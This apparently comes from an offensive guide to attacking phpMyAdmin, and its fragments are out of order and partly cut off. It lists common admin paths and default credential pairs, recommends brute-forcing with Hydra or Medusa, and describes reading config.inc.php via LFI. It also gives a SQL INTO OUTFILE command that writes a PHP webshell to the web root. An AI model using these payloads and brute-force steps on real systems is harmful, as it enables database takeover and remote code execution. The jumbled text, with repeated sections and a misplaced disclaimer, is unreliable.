| Path | Notes | |------|-------| | /phpmyadmin/ | Most common | | /pma/ | Shortened | | /mysql/ | Sometimes aliased | | /db/ | Generic | | /phpMyAdmin/ | Case-sensitive on Linux | | /sql/ | Rare but exists | | /admin/mysql/ | Nested admin | | /phpmyadmin4/ | Version-specific |
Use Hydra or Medusa with a small user/pass list. Limit to 5 attempts/sec to avoid lockouts. 2.2 HTTP Basic Auth Over phpMyAdmin’s Own Auth Some admins double-wrap phpMyAdmin with .htaccess . Bypass frequently fails, but a credential leak via referral headers or browser history is common.
With great power comes great responsibility. Verify permissions. Stay legal. Secure your stacks. Last verified against: MySQL 8.0.36, MariaDB 10.11, phpMyAdmin 5.2.1 (March 2025 threat landscape). phpmyadmin hacktricks verified
Check for exposed .htpasswd via path traversal (see later). 2.3 Config File Disclosure Leading to Auth Bypass The file config.inc.php contains the authentication method and credentials. If you can read it (via LFI or misconfiguration), you own the database.
$cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; $cfg['Servers'][$i]['password'] = 'Sup3rStr0ng!'; When auth_type = 'config' , you are automatically logged in on accessing phpMyAdmin. No password prompt. This is a catastrophic misconfiguration. Part 3: Post-Auth Exploitation – What an Attacker Does Next Once inside phpMyAdmin (with any user-level access), the attack escalates rapidly. 3.1 From phpMyAdmin to Remote Code Execution (RCE) A. INTO OUTFILE / INTO DUMPFILE If the database user has FILE privilege and secure_file_priv is empty, write a webshell: | Path | Notes | |------|-------| | /phpmyadmin/
| Credential Pair | Success Rate (Audited) | |----------------|------------------------| | root: (blank) | ~12% of default XAMPP/LAMP | | root:root | ~8% | | root:123456 | ~5% | | pma:pmapassword | Older configs | | admin:admin | Custom setups |
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; Check secure_file_priv : Bypass frequently fails, but a credential leak via
Use curl -I http://target/phpmyadmin/ – a 200 OK or 302 to index.php confirms presence. A 403 often reveals "Directory indexing denied" but still confirms existence. Fingerprinting Version via Assets Look for /phpmyadmin/themes/pmahomme/img/logo_left.png . Combined with doc/html/index.html or README , you can extract the exact version. Version matters because exploits differ widely between 2.x, 3.x, 4.x, and 5.x.
